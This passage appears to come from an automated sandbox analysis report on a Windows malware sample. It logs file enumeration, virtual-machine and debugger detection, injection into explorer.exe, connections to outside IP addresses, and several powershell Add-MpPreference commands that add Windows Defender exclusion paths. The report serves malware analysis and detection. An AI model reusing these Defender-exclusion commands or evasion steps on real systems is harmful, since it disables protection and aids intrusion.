                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FDC54
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009CC622 FindFirstFileExW,10_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A07333 FindFirstFileW,FindClose,10_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A087
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A0A1E2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_009FE472
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A0A570
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A066DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A066DC
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009CC622 FindFirstFileExW,13_2_009CC622
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A073D4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A07333 FindFirstFileW,FindClose,13_2_00A07333
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FD921
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_009FDC54
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA087
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_001BA1E2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_001AE472
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_001BA570
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B66DC FindFirstFileW,FindNextFileW,FindClose,20_2_001B66DC
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B7333 FindFirstFileW,FindClose,20_2_001B7333
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_001B73D4
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001AD921
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_001ADC54
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99C8D00 FindFirstFileExW,FindClose,21_2_00007FF6C99C8D00
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99E26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF6C99E26C4
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99D8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,21_2_00007FF6C99D8670
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00995FC8
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                        Source: explorer.exe, 00000012.00000000.2007455568.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: /f8vmusrvc
                        Source: DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: ComputerDefaults.exe, 00000026.00000002.2458413797.000002489A648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                        Source: End.pif, 0000000A.00000002.1945641936.0000000001D78000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000002.1945641936.0000000001D43000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F0122D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: q=fvmtoolsd
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmware
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VNfvmwareuser
                        Source: explorer.exe, 00000012.00000000.2007455568.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmsrvc
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                        Source: explorer.exe, 00000012.00000000.2007455568.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: S5%fvmwareservice
                        Source: explorer.exe, 00000012.00000000.2007455568.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
                        Source: cmd.exe, 00000020.00000002.2459266793.0000028829C88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56N#sEd
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwaretray8!
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: explorer.exe, 00000012.00000000.2004825375.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                        Source: explorer.exe, 00000012.00000000.2006529919.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                        Source: DE5A.exe, 0000002E.00000002.2588239210.000001E8E7E4C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: wsruwii, 00000014.00000003.2594405805.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeAPI call chain: ExitProcess graph end nodegraph_0-3791
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSystem information queried: CodeIntegrityInformationJump to behavior
                        Found API chain indicative of debugger detection
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_10-105391
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F4FF BlockInput,10_2_00A0F4FF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_0099338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0099338B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00995FC8
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B5058 mov eax, dword ptr fs:[00000030h]10_2_009B5058
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B5058 mov eax, dword ptr fs:[00000030h]13_2_009B5058
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00165058 mov eax, dword ptr fs:[00000030h]20_2_00165058
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_009F20AA
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_009C2992
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_009B0BAF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B0D45 SetUnhandledExceptionFilter,10_2_009B0D45
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_009B0F91
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_009C2992
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_009B0BAF
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B0D45 SetUnhandledExceptionFilter,13_2_009B0D45
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_009B0F91
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00172992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00172992
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00160BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00160BAF
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00160D45 SetUnhandledExceptionFilter,20_2_00160D45
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00160F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00160F91
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99CCA9C SetUnhandledExceptionFilter,21_2_00007FF6C99CCA9C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99DB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C99DB3CC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99CC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C99CC8BC
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 21_2_00007FF6C99CC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF6C99CC030
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF2BCE3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFDFF2BCE3C
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF241CB7 SetUnhandledExceptionFilter,22_2_00007FFDFF241CB7
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF242126 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFDFF242126

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Benign windows process drops PE files
                        Source: C:\Windows\explorer.exeFile created: wsruwii.18.drJump to dropped file
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\explorer.exeNetwork Connect: 65.108.69.93 443Jump to behavior
                        Source: C:\Windows\explorer.exeNetwork Connect: 179.159.229.64 80Jump to behavior
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifThread created: C:\Windows\explorer.exe EIP: 31619F8Jump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif base: 400000 value starts with: 4D5AJump to behavior
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write
                        Modifies Windows Defender protection settings
